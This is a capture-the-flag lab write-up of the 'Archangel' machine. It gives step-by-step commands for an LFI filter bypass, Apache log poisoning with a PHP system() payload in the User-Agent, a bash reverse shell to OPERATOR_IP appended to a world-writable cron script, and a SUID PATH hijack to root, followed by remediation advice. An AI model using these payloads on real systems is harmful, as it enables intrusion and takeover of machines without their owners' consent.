Case file

LFI log poison, writable cron, and SUID PATH hijack

Foundations Linux engagement: mafialive.thm LFI with filter bypass enabled Apache log poisoning to RCE; world-writable cron pivoted to archangel; SUID backup resolved cp from PATH for root.

Foundations28 minLinux · LFI · Log Poisoning · Privilege Escalation
  • Vhost discovery and LFI filter bypass led to log-poison RCE. A writable minute cron moved to archangel; PATH hijack of a SUID backup binary completed root.

  • Filter bypass included access.log; poisoned User-Agent executed commands as www-data.

  • Appended a reverse shell to /opt/helloworld.sh; cron executed as archangel.

  • Fake cp in PATH intercepted by SUID backup produced a root shell.

01

Engagement summary

Vhost discovery and LFI filter bypass led to log-poison RCE. A writable minute cron moved to archangel; PATH hijack of a SUID backup binary completed root.

ARCHANGEL required hosts entry for mafialive.thm. test.php?view= enforced a development_testing path prefix while blocking literal ../.. — .././ traversal still included /var/log/apache2/access.log. Poisoning User-Agent with PHP and re-including the log yielded www-data. /opt/helloworld.sh ran every minute as archangel and was world-writable; appending a reverse shell pivoted. SUID /home/archangel/secret/backup invoked relative cp; planting cp in PATH spawned root.

Business impact

LFI into logs is remote code execution. World-writable cron is horizontal privilege escalation. SUID helpers that shell out to PATH-resolved tools are root. Fix include filters with realpath allowlists, lock cron scripts, and use absolute paths in SUID binaries.

02

Vhost LFI and log poison RCE

Filter bypass included access.log; poisoned User-Agent executed commands as www-data.

OPERATOR · LFI

savvy@lab:~$ echo '<IP> mafialive.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ curl -s 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log'

savvy@lab:~$ curl -A '<?php system($_GET["cmd"]); ?>' http://mafialive.thm/

savvy@lab:~$ curl -s 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id'

uid=33(www-data) gid=33(www-data)

savvy@lab:~$ nc -lvnp 4444

savvy@lab:/var/www$

03

Writable cron to archangel

Appended a reverse shell to /opt/helloworld.sh; cron executed as archangel.

OPERATOR · CRON

savvy@lab:~$ cat /etc/crontab

*/1 * * * * archangel /opt/helloworld.sh

savvy@lab:~$ ls -la /opt/helloworld.sh

-rwxrwxrwx ... helloworld.sh

savvy@lab:~$ echo 'bash -i >& /dev/tcp/OPERATOR_IP/4445 0>&1' >> /opt/helloworld.sh

savvy@lab:~$ nc -lvnp 4445

savvy@lab:/home/archangel$

04

SUID backup PATH hijack

Fake cp in PATH intercepted by SUID backup produced a root shell.

OPERATOR · ROOT

savvy@lab:~$ ls -la /home/archangel/secret/backup

-rwsr-xr-x ... backup # calls relative cp

savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /home/archangel/secret/cp && chmod +x cp

savvy@lab:~$ export PATH=/home/archangel/secret:$PATH && ./backup

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Resolve includes with realpath against an allowlist. Make cron scripts non-writable. Compile SUID helpers with absolute binary paths or remove the setuid bit.